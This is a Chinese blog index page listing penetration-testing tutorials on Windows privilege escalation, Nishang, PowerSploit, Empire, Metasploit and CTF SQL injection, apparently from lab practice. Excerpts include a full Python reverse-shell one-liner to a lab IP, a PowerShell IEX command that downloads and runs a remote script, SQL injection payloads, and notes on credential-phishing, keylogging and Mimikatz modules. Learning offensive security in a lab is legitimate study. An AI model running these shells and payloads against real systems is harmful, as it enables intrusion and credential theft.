自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(40)
  • 收藏
  • 关注

原创 权限提升:Windows 操作系统配置错误利用分析及防范

在 Windows 操作系统中,攻击者通常会通过系统内核溢出漏洞来提权,但如果碰到无法通过系统内核溢出漏洞提取所在服务器权限的情况,就会利用系统中的配置错误来提权。Windows 操作系统中的常见配置错误包括管理员凭据配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。1.系统服务权限配置错误 Windows 系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,就可以将该文件替换...

2021-11-29 18:03:49 3069

原创 系统内核溢出漏洞提权

系统内核溢出漏洞提权是一种通用的提权的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁。存在局限性:如果目标系统的补丁更新工作较为迅速和完善,那么攻击者要想通过这种方法提权,就必须找出目标系统中的 0day漏洞存在四种发现缺少补丁方法方法一:手动执行命令先获取目标系统的一个普通用户的shell(common shell),...

2021-11-28 21:57:43 3801

原创 Python 反向 Shell 代码分析

import os,socket,subprocess;s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(('192.168.110.130',2222))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(['/bin/sh','-i'])s = socket.socket(socket.AF_INET,.

2021-11-27 17:13:40 1072

原创 Nishang:权限提升

1.下载执行 Download_Execute 是 Nishang 中的下载执行脚本,常用于下载文本文件,然后将其转换为可执行文件执行利用 Nishang 中的 exetotext.ps1 脚本将 Metasploit 生成的木马端 msf.exe 更改为文本文件 msf.txtExetoText 2.Bypass UACInvoke-PsUACme 模块使用了来自 UACME 项目的DLL来绕过UAC,作用是绕过UAC,比较全面...

2021-11-25 16:06:47 357

原创 Nishang:Powershell 隐藏通信隧道、WebShell 后门

一、Powershell 隐藏通信隧道1.基于TCP协议的 Powershell 交互式 ShellInvoke-PowerShellTcp 是基于TCP协议的 Powershell 正向连接或反向连接 shellIPAddress <String> //选择 -Reverse 选项时表示需要连接 ip 地址Port <int32> //选择 -Reverse 选项时表示需要连接的端口,选择 -Bind 选项时表示需要监听的端口Reverse /

2021-11-24 14:48:50 2481

原创 Nishang 模块攻击实战

windows 中已导入模块 nishang.psm11.Check-VM检测当前机器是否为一台已知的虚拟机。通过检测已知的虚拟机的指纹信息(如 Hyper-V、VMware、Virtual PC、Virtual Box、Xen、QEMU)来识别。2.Invoke-CredentialsPhish作用:欺骗目标主机的用户,让用户输入密码可更改脚本,不输入正确密码关闭不了对话框,只能强制结束进程。这样做成功得到明文的管理员账户密码3.Copy-VSS利用 Volum

2021-11-23 15:01:30 1957

原创 Nishang 基础知识

Nishang 是一款针对 PowerShell 的渗透工具。它基于 PowerShell 的渗透测试专用工具,集成了框架、脚本和各种payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试的各个阶段https://github.com/samratashok/nishang //下载地址 Nishang 要在 PowerShell3.0以上的环境中才可以正常使用,也就是在 Windows7默认下是有点小问题的,因为它自带的环境时...

2021-11-22 23:26:16 3387

原创 MSF:Web 后门

Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...

2021-11-21 18:03:09 1909

原创 Metasploit 基础

一、模块1.Auxiliary(辅助模块)不会直接在测试者和目标主机之间建立访问,只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试2.Exploit(漏洞利用模块)漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包括攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码3.Payload(攻击载荷模块)攻击载荷

2021-11-21 17:13:20 1085

原创 PowerUp攻击模块

poweUp 是 Privesc 模块下的脚本,拥有众多用来寻找目标主机 Windows 服务漏洞进行提权的实用脚本 通常,在 Windows 下可以通过内核漏洞来提升权限,但是,可能会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的 Windows 服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权不行的时候,帮助寻找服务器的弱点,进而通过脆弱点实现提权的目的...

2021-11-17 15:17:37 870

原创 Empire 权限提升

提权:提高自己在服务器中的权限。比如在Windows中,本身登录的用户是guest,通过提权后就变成超级管理员,拥有了管理 Windows 的所有权限。一般用于网络入侵和系统入侵1.Bypass UACusemodule privesc/bypassuacset Listener XXXexecute上线一个新的反弹,带星号为提权成功的agents2.bypassuac_wscript原理:使用 C:\Windows\wscript.exe 执行 Payload,即绕过

2021-11-14 16:05:57 614

原创 Empire信息收集

Empire主要用于后渗透,所以信息收集是一个常用的模块,可以使用 search module 命令搜索需要使用的模块,键入 usemodule collection 然后空格(1)和Tab键(2)查看完整的列表环境:目标主机1.屏幕截图(不需要设置多余的参数)usemodule collection/screenshotinfoexecuteback2.键盘记录usemodule collection/keyloggerexecute启动后开始记录目标主机.

2021-11-14 15:08:45 1382

原创 Empire监听、木马、连接

Empire:设置监听,生成木马,然后在目标主机运行该木马,监听会连接上反弹回来的代理( 与 msf 监听模块handler 类似)1.在 Empire目录下,输入 ./empire 打开2.输入 help 查看具体的使用帮助3.建立监听,输入 listeners,help 查看帮助文件4.输入 uselistener 设置采用何种模式, 通过1次空格和2次Tab 可以看到所有可使用的模式,选择 http 监听模式,输入 uselistener http ,然后输入 info 查

2021-11-13 22:22:06 2133

原创 kali安装empire出现各种缺module问题

注意:empire环境python2(python --version)1.根据以下步骤下载 empiregit clone https://github.com/EmpireProject/Empire.gitcd Empire/cd setup/sudo ./install.sh2.安装完后,运行(返回Empire目录下,输入 ./empire)cd .../empire3.爆出没有flask模块,我只是 pip install flask就成功了4.之后运行又出现

2021-11-10 10:24:24 1027 2

原创 Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes

一、Invoke-PortscanRecon 模块的一个脚本,主要用于端口扫描1.下载脚本IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1")2.扫描Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444"二、Invo

2021-11-08 17:51:57 494

原创 PowerSploit 之 Invoke-DllInjection

DLL(Dynamic Link Library 可由多个程序同时使用的代码和数据的库):库文件,提供给使用者一些开箱即用的变量、函数或类。库文件分为静态库和动态库,静态库和动态库的区别体现在程序的链接阶段:静态库在程序的链接阶段被复制到了程序中;动态库在链接阶段没有被复制到程序中,而是程序在运行时由系统动态加载到内存中供程序调用。使用动态库系统只需载入一次,不同的程序可以得到内存中相同的动态库的副本,因此节省了很多内存,而且使用动态库也便于模块化更新程序。静态链接库与动态链接库都是共享代码的方式,如果

2021-11-08 17:23:08 383 1

原创 PowerSploit 之 Invoke-ShellCode

Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码)反向连接的shellcode:当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.

2021-11-08 10:53:25 1616 1

原创 PowerSploit 搭建

PowerSploit 是一款基于powershell 的后渗透(Post-Exploitation)框架软件,包含很多powershell攻击脚本,它们主要用于渗透中的信息侦察,权限提升,权限维持下载地址:https://github.com/PowerShellMafia/PowerSploit1.直接在 kali 中下载,git命令2.开启 Apache 服务,在网页输入http://ip 地址,可以看到成功开启service apache2 start 3. 简易服务...

2021-11-07 11:38:13 752

原创 PowerShell 基本知识

在 powershell 下,类似“cmd”命令,叫做“cmdlet”,powershell 命令不区别大小写为防止恶意脚本的执行,powershell 有一个执行策略,默认情况下,执行策略被设为受限Get-ExecutionPolicy(执行策略)Restricted:脚本不能受限(默认设置)RemoteSigned:本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)AllSigned:仅当脚本由受信任的发布者签名时才能运行Unrestricted:允许所

2021-11-07 11:09:46 8979

原创 系统内核溢出漏洞提权之Windows Exploit Suggester

Windows Exploit Suggester工具:将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其需要的只有目标系统的信息下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester(如果下载失败,可以看之前的文章)1.使用systeminfo 命令 ,并将补丁信息导入文件(patches.txt)(shell)systeminfo > patches.txt ..

2021-11-03 00:00:15 693

原创 kali切换python版本

1.查看目前系统中所有python版本,存在python2 和 python3ls /usr/bin/python*2.想要切换python版本,输入命令出现问题update-alternatives --config python 出现这个问题是由于python版本未被update-alternatives识别3.解决方法,执行后python版本默认python3(优先级150 > 100)update-alternatives --install /usr..

2021-11-02 20:51:04 2159

原创 git clone出现问题:GnuTLS recv error (-54): Error in the pull function.

查询之后很多人都说是网络问题,连接不好解决方法:修改下载方式:https --> sshssh:Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户

2021-11-01 23:33:59 3269

原创 win7命令行目录切换

1.命令行本身处于C盘,那么想要切换到根目录C盘,必须输入 cd C:\(反斜杠必须要)cd C:\(失败)(成功案例)2.命令行处于别的盘目录,可以直接输入 C:或者 命令行处于C盘,想要切换到别的盘,直接输入 D:(不需要加反斜杠)3.到达某个子目录,先切换根目录,输入 cd+完整目录路径 或者 cd+接下来的子目录(逐级进) ...

2021-11-01 17:33:45 1220

原创 meterpreter shell 出入 cmd

进入:shell出去:exit

2021-11-01 08:59:14 328

原创 windows shell 乱码显示问题

msf渗透win7(x64)后获得meterpreter shell , 可通过输入 shell 进入其目标机的进程下。cmd出现乱码问题:解决方法:chcp 65001

2021-10-27 16:48:15 614

转载 BurpSuite Fuzz

转载:利用 Burpsuite Fuzz 实现 SQL 注入_凡宇-CSDN博客

2021-10-18 11:07:08 427

原创 Windows Server 2012 R2无法正常安装VMware tools

在Windows Server 2012 R2上安装 VMware Tools使出现错误:解决方法:在VMWare虚拟机中的Windows Server 2012操作系统上安装Windows8.1-KB2919442-x64.msu与Windows8.1-KB2919355-x64.msu更新文件。(可以直接通过IE安装,不需要先在物理机上安装,分享到虚拟机上)IE打开网页时,可能会出现IE增强安全配置,选择关闭(每一个网页都出现,很麻烦)" 服务管理器 " ——> ..

2021-10-14 23:31:07 2326 1

原创 windows域用户切换本地用户

首先,可以看到当前windows用户是登录到hacke域中;我的要求不是使用域用户登录计算机,而是使用本地用户登录计算机点击“如何登录到其它域”,可以看到计算机已经给出了明确的提示,就是计算名\本地用户(用户密码差点被server2008弄晕,win7用户密码是没有任何限制要求的)如果忘记了本地用户名,可以通过域用户登录的计算机寻找,毕竟d(查询计算机所有用户)net user 本地用户登录还有一个小技巧,如果计算机名太长或者已经忘记了,可以使用 “ .\用户名 ” 登录

2021-10-14 23:15:37 16193 1

原创 kali linux换国内源

1.打开源文件vim /etc/apt/sources.list2.输入字母 " i "(insert),编辑源文件,状态显示在左下角3.将之前的官方源用 " # " 注释,输入国内源,选择其中一个,这里我选了阿里云# 官方源# deb http://http.kali.org/kali kali-rolling main non-free contrib# deb-src http://http.kali.org/kali kali-rolling main non-fr.

2021-10-14 22:53:44 2015 2

原创 kali linux查看系统版本、内核

一、查看系统版本方法一:cat /etc/issue方法二:lsb_release -aDistributor ID: Kali Description: Kali GNU/Linux RollingRelease: 2021.3 //kali版本Codename: kali-rolling //系统内核二、查看系统内核方法一:cat /proc/versionLinux version 5...

2021-10-14 22:32:14 14361

原创 GPG error

环境:kali linux2019 / 2021在换源时后输入 apt-get update 时,出现gpg错误

2021-10-14 22:06:53 1359

原创 win7 x64查询信息命令

1.查询网络配置信息ipconfig /all2.查询操作系统及软件信息(1)查询操作系统和版本信息(中文版操作系统)systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"(2)查看系统体系结构echo %processor_architecture%(3)查看安装的软件及版本、路径等WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具) ,提供了从命令行接口和批.

2021-10-12 17:09:43 735

原创 WMIC脚本自动收集信息

WMIC(Windows Management Instrumentation Command-Line,Windows管理工具命令行)是最有用的Windows命令行工具。在默认情况下,任何版本的Windows XP的低权限的用户不能访问WMIC,Windows7以上版本的低权限用户允许访问WMIC并执行相关查询操作脚本链接:http://www.fuzzysecurity.com/scripts/files/wmic_info.rar直接执行脚本,会将所有的结果写入一个HTML文件..

2021-10-12 17:09:02 494

原创 MSF之Persistence后门

Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件一、实验环境攻击主机:2021 Kali (ip:192.168.110.130)靶机:win7(专业版) (ip:192.168.110.134)准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞)二、实验步骤1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...

2021-09-27 11:02:03 2816 1

原创 MSF利用漏洞永恒之蓝MS17-010

MS17-010:利用微软SMB远程代码执行漏洞,基于端口445SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。一、实验环境攻击主机:2021 Kali ip:192.168.110.130(ifcon...

2021-09-27 00:04:26 1215

原创 将Common shell 提升为 Meterpreter shell

对目标主机攻击获取的不一定是一个meterpreter shell(交互式shell),可能只是一个 common shell在shell中,先输入Ctrl+z,然后输入y (把shell隐藏到后台,sell 为 session 1)隐藏 shell 后,此时处于 msf 界面中,可以输入 sessions -l 查看session会话情况结果显示:session 1 是 cmd/unix(common shell)想要将 common shell 提升为 meterpret...

2021-09-21 23:34:49 826

原创 [极客大挑战 2019]BabySQL

登录,随便尝试用户名和密码,然后使用万能钥匙:username=admin‘ or 1=1%23&password=admin' or 1=1%23输入万能钥匙后,出现错误,仔细对比 输入语句和错误语句部分,发现 or 被过滤了尝试绕过过滤,or 变成 oorr ; 成功输出,说明这种绕过方式是可以的,源代码应该是采用replaceusername=admin' oorr 1=1%23&password=admin' oorr 1=1%23输入order...

2021-09-17 16:52:25 84

原创 [极客大挑战 2019]LoveSQL

惯例,先登录登录失败,尝试万能钥匙:username=admin‘ or 1=1%23&password=admin' or 1=1%23

2021-09-17 11:29:15 105

原创 [强网杯 2019]随便注

点击 “提交查询”,get传参输入 inject=1 and 1=1,没有改变,表名inject类型为字符型,尝试使用万能钥匙 inject=-1' or 1=1%23 , 没有关于flag信息尝试堆叠注入 inject=1';show tables%23 ,出现此时正在使用的数据库的所有表堆叠注入有效果,那么就查询表的列:inject=-1';show columns from `1919810931114514`;%23可以看到这个表中存在flag列注意:SQ...

2021-09-15 23:47:01 54

原创 [极客大挑战 2019]EasySQL

可以看到页面有用户名和密码的输入框,一开始不知道存在什么问题,因此可以尝试着在用户名和密码中随意输入此时可以看到网页url上显示:check.php?username=admin&password=admin,说明是get传参猜测username和password字段很大可能是字符串这道题并不清楚username和password值为什么,不可能一个个用户名和密码去尝试,因此试着输入SQL字符串注入username=admin' or 1=1%23&password...

2021-09-15 21:39:52 89

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除